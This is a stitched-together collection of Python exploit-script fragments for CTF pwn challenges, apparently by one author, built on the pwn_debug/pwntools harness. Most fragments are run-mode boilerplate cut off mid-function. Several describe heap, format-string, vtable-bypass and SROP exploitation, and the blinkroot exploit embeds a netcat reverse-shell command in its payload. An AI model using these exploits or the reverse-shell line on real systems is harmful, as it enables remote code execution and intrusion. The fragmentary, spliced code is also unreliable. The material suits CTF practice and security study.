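def run_exp(ip, port, remote):
    """Relaunch ./babycpp and call pwn() until it returns a truthy flag.

    Every iteration rebuilds the pwn_debug harness, starts a fresh *local*
    run (the "remote"/"debug" alternatives are left commented out) and
    calls ``pwn(remote)``.  A falsy result or any exception counts as a
    failed attempt: the process is closed and the loop starts over, so the
    function never returns unless an attempt succeeds.

    Args:
        ip, port: forwarded to ``pdbg.remote``; only relevant if a remote
            run mode is enabled.
        remote: passed through to ``pwn``; when falsy the ``membp`` helper
            is also published as a module global.

    Returns:
        Whatever truthy value ``pwn`` returned (also printed).
    """
    global pdbg
    global p
    global membp
    global elf
    global libc
    pdbg = pwn_debug("./babycpp")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    #elf=pdbg.elf
    #libc=pdbg.libc
    pdbg.local()
    pdbg.debug("2.27")
    pdbg.remote(ip, port)
    while True:
        # Reset so a failure inside pdbg.run() cannot leave a stale handle
        # from the previous attempt (the original called p.close() on a name
        # that might be unset or already closed).
        p = None
        try:
            p = pdbg.run("local")
            #p=pdbg.run("remote")
            #p=pdbg.run("debug")
            elf = pdbg.elf
            libc = pdbg.libc
            if not remote:
                membp = pdbg.membp
            flag = pwn(remote)
            if flag:
                print(flag)
                return flag
        except Exception as e:
            # Python 2/3-compatible spelling of the original handler.
            print(str(e))
        # Failed attempt (exception or falsy flag): release the process
        # before retrying so unsuccessful tries do not accumulate.
        if p is not None:
            p.close()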
def run_exp(ip,port,remote):
    """Build the harness for ./one, start it in one mode and hand off to pwn().

    A remote run is selected when ``remote`` is truthy; otherwise the
    binary is started under the debugger and ``membp`` is published as a
    module global.  The ELF/libc handles are exported as globals either way.

    Args:
        ip, port: passed to ``pdbg.remote``.
        remote: run-mode selector, also forwarded to ``pwn``.

    Returns:
        The value returned by ``pwn(remote)``.
    """
    global pdbg, p, membp, elf, libc
    pdbg = pwn_debug("./one")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    pdbg.local()
    pdbg.debug("2.27")
    pdbg.remote(ip, port)
    if remote:
        p = pdbg.run("remote")
    else:
        p = pdbg.run("debug")
        membp = pdbg.membp
    elf = pdbg.elf
    libc = pdbg.libc
    return pwn(remote)
def run_exp(ip, port, remote):
    """Build the harness for ./trywrite, launch it and hand off to pwn().

    The run mode is "remote" when ``remote`` is truthy and "local"
    otherwise; for local runs the ``membp`` helper is also exported.
    ``elf``/``libc`` are exported as module globals in both cases.

    Args:
        ip, port: passed to ``pdbg.remote``.
        remote: run-mode selector, also forwarded to ``pwn``.

    Returns:
        The value returned by ``pwn(remote)``.
    """
    global pdbg, p, membp, elf, libc
    pdbg = pwn_debug("./trywrite")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    pdbg.local("./libc-2.27.so")
    pdbg.debug("2.27")
    pdbg.remote(ip, port)
    mode = "remote" if remote else "local"
    p = pdbg.run(mode)
    if not remote:
        membp = pdbg.membp
    elf = pdbg.elf
    libc = pdbg.libc
    return pwn(remote)
def run_exp(ip, port, remote):
    """Build the harness for ./random (glibc 2.23), launch it and call pwn().

    Local runs use the bundled libc/ld pair given to ``pdbg.local``; the
    remote target is registered with the same libc file.  The run mode is
    "remote" when ``remote`` is truthy, "local" otherwise (which also
    exports ``membp``).

    Args:
        ip, port: passed to ``pdbg.remote``.
        remote: run-mode selector, also forwarded to ``pwn``.

    Returns:
        The value returned by ``pwn(remote)``.
    """
    global pdbg, p, membp, elf, libc
    pdbg = pwn_debug("./random")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    pdbg.local("./libc-2.23.so", "/glibc/x64/2.23/lib/ld-2.23.so")
    pdbg.debug("2.23")
    pdbg.remote(ip, port, "./libc-2.23.so")
    mode = "remote" if remote else "local"
    p = pdbg.run(mode)
    if not remote:
        membp = pdbg.membp
    elf = pdbg.elf
    libc = pdbg.libc
    return pwn(remote)
# File: exp.py # Author: raycp # Date: 2019-06-10 # Description: exp for neighbor_c, bruteforce to guess stack addr and stdout addt by 4bytes, and change stderr.fileno to 1, which then can leak address. then write one gadget to malloc_hook, at last trigger malloc from pwn_debug import * pdbg = pwn_debug("./neighbor_c") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def format_one(payload): p.sendline(payload)
# Star import: pwn_debug re-exports the pwntools helpers used below (context, u32, u64).
from pwn_debug import *
# Harness wrapper around the target binary.
pdbg = pwn_debug("./anti")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal = ['tmux', 'splitw', '-h']
# 'debug' echoes every byte sent and received; handy while developing, noisy otherwise.
context.log_level = 'debug'
# Run-mode configuration; only the mode selected by `switch` below is started.
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote('172.1.2.15', 9999, "./libc-2.23.so")
# 1 = local, 2 = debug, 3 = remote. Any other value leaves `p` unbound.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Short I/O aliases. str() is applied so ints can be sent as text; this relies on
# Python 2 str semantics (on Python 3, str(bytes) would not round-trip).
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
# NUL-pad short reads before unpacking as little-endian 32/64-bit integers.
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
# Debugger helpers: set breakpoints / resolve symbols through the harness.
bp = lambda bkp: pdbg.bp(bkp)
sym = lambda symbol: pdbg.sym(symbol)
def bpp():
# File: IO_FILE_str_finish_vtable_bypass.py # Author: raycp # Date: 2019-06-01 # Description: template for bypass vtable check with str_jumps vtable from pwn_debug import * pdbg=pwn_debug("./binary") pdbg.context.terminal=['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc def pwn(): #pdbg.bp([]) libc_base=0x0 io_list_all=libc_base+libc.symbols['_IO_list_all']
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: exp for syscall_interface from pwn_debug import * pdbg = pwn_debug("./syscall_interface") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #context.log_level="debug" #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def syscall(syscall_number, arg): p.recvuntil("choice:") p.sendline("0") p.recvuntil("number:") p.sendline(str(syscall_number))
# Star import: pwn_debug re-exports the pwntools helpers used below (context, u32, u64).
from pwn_debug import *
# Harness wrapper around the target binary.
pdbg=pwn_debug("./babygame")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal=['tmux', 'splitw', '-h']
# 'debug' echoes every byte sent and received; handy while developing, noisy otherwise.
context.log_level='debug'
# Run-mode configuration; only the mode selected by `switch` below is started.
pdbg.local("")
pdbg.debug("2.23")
# NOTE(review): no host/port is given here, so switch=3 presumably cannot connect as written.
pdbg.remote()
# 1 = local, 2 = debug, 3 = remote. Any other value leaves `p` unbound.
switch=1
if switch==1:
    p=pdbg.run("local")
elif switch==2:
    p=pdbg.run("debug")
elif switch==3:
    p=pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Short I/O aliases. str() is applied so ints can be sent as text; this relies on
# Python 2 str semantics (on Python 3, str(bytes) would not round-trip).
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
# NUL-pad short reads before unpacking as little-endian 32/64-bit integers.
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
# Debugger helpers: set breakpoints / resolve symbols through the harness.
bp = lambda bkp :pdbg.bp(bkp)
sym = lambda symbol :pdbg.sym(symbol)
def bpp():
    # Break with an empty breakpoint list (i.e. just attach/pause).
    bp([])
# File: exp.py # Author: raycp # Date: 2019-06-09 # Description: exp for HeapsOfPrint, form a loop by format vlun and write by rbp from pwn_debug import * pdbg = pwn_debug("./HeapsOfPrint") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def format_one(payload): p.sendline(payload)
from pwn_debug import * ## step 1 pdbg = pwn_debug("test-fopen") pdbg.context.terminal = ['tmux', 'splitw', '-h'] ## step 2 pdbg.local("libc.so.6") pdbg.debug("2.23") #pdbg.remote('34.92.96.238',10000) ## step 3 #p=pdbg.run("debug") #p=pdbg.run("remote") # pause() pdbg.bp([0x400450]) p = pdbg.run("local") p.interactive()
# File: exp.py # Author: raycp # Date: 2019-05-31 # Description: exp for blinkroot from pwn_debug import * pdbg = pwn_debug("./blinkroot") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") elf = pdbg.elf libc = pdbg.libc def pwn(): addr = 0x600BC0 plt0 = 0x600B40 payload = p64(0x10000000000000000 - (addr - plt0)) payload += p64(addr + 0x100) payload += "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" payload = payload.ljust(0x100, '\x00')
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: exp for gundam from pwn_debug import * pdbg=pwn_debug("./gundam") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(name,typ): p.recvuntil("choice : ") p.sendline("1") p.recvuntil("gundam :")
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for baby_tcache, unlink to form overlap chunk by off-by-null vuln,bruteforce to overwrite stdout to leak from pwn_debug import * pdbg = pwn_debug("./baby_tcache") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p = pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def new(size, content): p.recvuntil("choice: ") p.sendline("1") p.recvuntil("Size:")
# Star import: pwn_debug re-exports the pwntools helpers used below (context, u32, u64).
from pwn_debug import *
import time
# Harness wrapper around the target binary.
pdbg = pwn_debug("printf_test")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal = ['tmux', 'splitw', '-h']
# 'debug' echoes every byte sent and received; handy while developing, noisy otherwise.
context.log_level = 'debug'
# Run-mode configuration. NOTE(review): no pdbg.debug(...) call and pdbg.remote() has no
# host/port, so presumably only switch=1 works as written.
pdbg.local("")
pdbg.remote()
# 1 = local, 2 = debug, 3 = remote. Any other value leaves `p` unbound.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Short I/O aliases. str() is applied so ints can be sent as text; this relies on
# Python 2 str semantics (on Python 3, str(bytes) would not round-trip).
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
# NOTE(review): str.ljust requires a fill character of exactly one character; an empty
# fill raises TypeError. Either a NUL was stripped from this copy or it should be '\x00'
# as in the sibling templates.
uu32 = lambda data: u32(data.ljust(4, ''))
uu64 = lambda data: u64(data.ljust(8, ''))
# Debugger helper: set breakpoints through the harness.
bp = lambda bkp: pdbg.bp(bkp)
# Mutable default argument; harmless only as long as the list is never mutated.
def bpp(m=[]):
    bp(m)
# File: exp.py
# Author: raycp
# Date: 2019-05-21
# Description: exp for babyprintf_ver2
# Star import: pwn_debug re-exports the pwntools helpers used below.
from pwn_debug import *
# Harness wrapper around the target binary.
pdbg = pwn_debug("babyprintf_ver2")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.context.log_level="debug"
# Run-mode configuration. NOTE(review): the local run uses a 2.27 loader while the
# debug run asks for glibc 2.24 — confirm which version the target actually needs.
pdbg.local("./libc64.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
# Active mode: attached under the debugger.
p = pdbg.run("debug")
# Base-address helper exposing elf_base/libc_base.
membp = pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
# Python 2 print statement (this script is not Python 3 compatible as written).
print hex(membp.elf_base), hex(membp.libc_base)
# ELF handles for the target and the libc it was started with.
elf = pdbg.elf
libc = pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base
def do_one(data):
    p.send(data)
# File: exp.py # Author: raycp # Date: 2019-05-28 # Description: exp for 2ez4u from pwn_debug import * pdbg=pwn_debug("./2ez4u") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc.so","/glibc/x64/2.24/lib/ld-2.24.so") pdbg.debug("2.24") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) #elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_basei def add(size,desc,color='0',value='0',num='0'): p.recvuntil("hoice: ") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-05-31 # Description: exp for babystack from pwn_debug import * pdbg = pwn_debug("./babystack") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #a=IO_FILE_plus() #print a #a.show() def pwn(): p3_ret = 0x080484e9 #: pop esi ; pop edi ; pop ebp ; ret pebp_ret = 0x080484eb #: pop ebp ; ret leave_ret = 0x080483a8 # : leave ; ret
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for house of atum, tcache and fastbin chain to form the 0x10 byte backwards from pwn_debug import * pdbg = pwn_debug("./houseofAtum") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(content): p.recvuntil("choice:") p.sendline("1") p.recvuntil("ontent:")
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for god-the-reum,uaf in withdraw function from pwn_debug import * pdbg = pwn_debug("./god-the-reum") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p = pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def create(eth): p.recvuntil("choice : ") p.sendline("1") p.recvuntil("eth? : ")
# File: exp.py # Author: raycp # Date: 2019-06-02 # Description: template for srop from pwn_debug import * pdbg = pwn_debug("./smallest") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.23") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def pwn(): ## sigreturn syscall number is 15 in x64, 119 in x86 frame = SigreturnFrame()
# Star import: pwn_debug re-exports the pwntools helpers used below (context, u32, u64).
from pwn_debug import *
# Harness wrapper around the target binary.
pdbg = pwn_debug("./pwn")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal = ['tmux', 'splitw', '-h']
# 'debug' echoes every byte sent and received; handy while developing, noisy otherwise.
context.log_level = 'debug'
# Run-mode configuration. NOTE(review): no pdbg.debug(...) call and pdbg.remote() has no
# host/port, so presumably only switch=1 works as written.
pdbg.local("")
pdbg.remote()
# 1 = local, 2 = debug, 3 = remote. Any other value leaves `p` unbound.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Short I/O aliases. str() is applied so ints can be sent as text; this relies on
# Python 2 str semantics (on Python 3, str(bytes) would not round-trip).
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
# NUL-pad short reads before unpacking as little-endian 32/64-bit integers.
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
# Debugger helper: set breakpoints through the harness.
bp = lambda bkp: pdbg.bp(bkp)
def bpp():
    # Break with an empty breakpoint list (i.e. just attach/pause).
    bp([])
# File: exp.py # Author: raycp # Date: 2019-06-03 # Description: exp for children_tcache,unlink to form overlap chunk by off-by-null vuln from pwn_debug import * pdbg=pwn_debug("./children_tcache") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc-2.27.so","/glibc/x64/2.27/lib/ld-2.27.so") pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) p=pdbg.run("local") #p=pdbg.run("remote") #p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def new(size,content): p.recvuntil("choice: ") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for three, uaf to brute force to overwrite stdout to leak libc from pwn_debug import * pdbg=pwn_debug("./three") pdbg.context.terminal=['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(content): p.recvuntil("choice:") p.sendline("1")
# File: exp.py # Author: raycp # Date: 2019-05-29 # Description: exp for heapstorm2 from pwn_debug import * pdbg = pwn_debug("./heapstorm2") pdbg.context.terminal = ['tmux', 'splitw', '-h'] pdbg.local("") pdbg.debug("2.23") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_basei def add(size, ): p.recvuntil("mand: ")
# File: exp.py # Author: raycp # Date: 2019-06-06 # Description: exp for girlfriend, bypass double free check for tcache in glibc 2.29 from pwn_debug import * pdbg = pwn_debug("./chall") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def add(size, name, phone): p.recvuntil("choice:") p.sendline("1") p.recvuntil("girl's name")
# Star import: pwn_debug re-exports the pwntools helpers used below (context, u32, u64).
from pwn_debug import *
import time
# Harness wrapper around the target binary.
pdbg = pwn_debug("pwn")
# Terminal command used to open the debugger window (tmux horizontal split).
pdbg.context.terminal = ['tmux', 'splitw', '-h']
# 'debug' echoes every byte sent and received; handy while developing, noisy otherwise.
context.log_level = 'debug'
# Run-mode configuration. NOTE(review): no pdbg.debug(...) call and pdbg.remote() has no
# host/port, so presumably only switch=1 works as written.
pdbg.local("")
pdbg.remote()
# 1 = local, 2 = debug, 3 = remote. Any other value leaves `p` unbound.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Short I/O aliases. str() is applied so ints can be sent as text; this relies on
# Python 2 str semantics (on Python 3, str(bytes) would not round-trip).
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
# NUL-pad short reads before unpacking as little-endian 32/64-bit integers.
uu32 = lambda data: u32(data.ljust(4, '\x00'))
uu64 = lambda data: u64(data.ljust(8, '\x00'))
# Debugger helper: set breakpoints through the harness.
bp = lambda bkp: pdbg.bp(bkp)
# Mutable default argument; harmless only as long as the list is never mutated.
def bpp(m=[]):
    bp(m)
    # NOTE(review): used as a pause; on Python 2, input() evaluates whatever is typed,
    # raw_input() is the plain "press Enter" wait.
    input()
# File: exp.py # Author: raycp # Date: 2019-05-21 # Description: exp for stackoverflow from pwn_debug import * pdbg=pwn_debug("stackoverflow") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local() pdbg.debug("2.24") pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print type(pdbg.membp) #print pdbg.hh #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_base def malloc_one(size=0,data="",real_size=0,flag=False): p.recvuntil("flow: ") p.sendline(str(size))
# File: exp.py # Author: raycp # Date: 2019-06-08 # Description: exp for EasiestPrintf, trigger malloc by printf from pwn_debug import * pdbg = pwn_debug("./EasiestPrintf") pdbg.context.terminal = ['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p = pdbg.run("debug") membp = pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf = pdbg.elf libc = pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def pwn(): pdbg.bp(0x804881C) p.recvuntil("read:\n")
# File: exp.py # Author: raycp # Date: 2019-05-29 # Description: exp for babyheap from pwn import * from pwn_debug import * pdbg=pwn_debug("babyheap") pdbg.context.terminal=['tmux', 'splitw', '-h'] pdbg.local("./libc-2.23.so") pdbg.debug("2.23") pdbg.remote('123.206.174.203', 20001,"./libc-2.23.so") #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") #membp=pdbg.membp #print type(pdbg.membp) #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #a=IO_FILE_plus() #print a #a.show() #print a._IO_read_base def add(size): p.recvuntil("Choice: ")